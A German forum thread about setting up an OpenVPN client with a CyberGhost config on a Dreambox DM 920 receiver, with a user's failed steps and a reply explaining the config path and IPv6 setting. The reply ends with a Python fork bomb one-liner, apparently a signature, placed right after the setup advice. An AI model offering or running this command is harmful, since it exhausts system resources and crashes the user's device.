Open VPN auf Dreambox DM 920

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Open VPN auf Dreambox DM 920

      Hallo
      Der andere Forumeintrag zum Thema OpenVpn war gesperrt deshalb frage ich mal so...

      Ich glaube ich mache irgendwas falsch. Ich bräuchte mal eure Hilfe bei der Einrichtung falls möglich. Sitze da schon seit Stunden dran..... Ich wollte von open ATV auf Newnigma2 umsteigen. Geflasht und gut.

      Dann VPN einrichten ....

      1.apt-get update && apt-get install enigma2-plugin-newnigma2-vpn - damit installiert
      2.reboot
      3.die Zip von Cyberghost ins /tmp
      4.Plugin aufgemacht : - Autostart an , - usr und passwd eingetragen , - installieren aktieviert und grün bestätigt
      5.reboot

      Er sagt dann im Plugin das es läuft - zeigt aber keine IP Adresse an

      wenn ich

      wget checkip.dyndns.org/ -q -O - |
      grep -Eo '\<[[:digit:]]{1,3}(\.[[:digit:]]{1,3}){3}\>'

      nutze hat meine box immer noch die IP vom Provider.....
      Was mache ich falsch? Was habe ich vergessen?
      Achso und eine log Datei ist auch nicht vorhanden....


      Wäre cool wenn du helfen könntest
      Vielen Dank schon mal 

      Gesendet von meinem IN2023 mit Tapatalk

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Exaban ()

    • Ich habe das vpn von hier angefangen auszudünnen (morgen auf dem feed).
      Die config die erwartet wird ist /etc/openvpn/openvpn.ovpn habt ihr eine eigene funktionierende? wenn ja ins verzeichnis kopieren mit start stop könnt ihr das steuern (Benutzer und passwort in der gui ignorieren ).
      Alternativ:
      Das installieren mit cyberghost *openvpn.zip ist recht einfach benutzer und password eingeben in der gui haken setzen bei install und vorher das zip file nach /etc/openvpn legen und grün drücken.Danach sollte das gehen.
      Aber wichtig ist euere config muss auch funktionieren sonst nutzt kein manager oder was auch immer etwas.Auch zu beachten ist das das ihr in den netzwerkeinstellungen ipv6 abschalten müsst wenn ihr kein ipv6 nutzt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !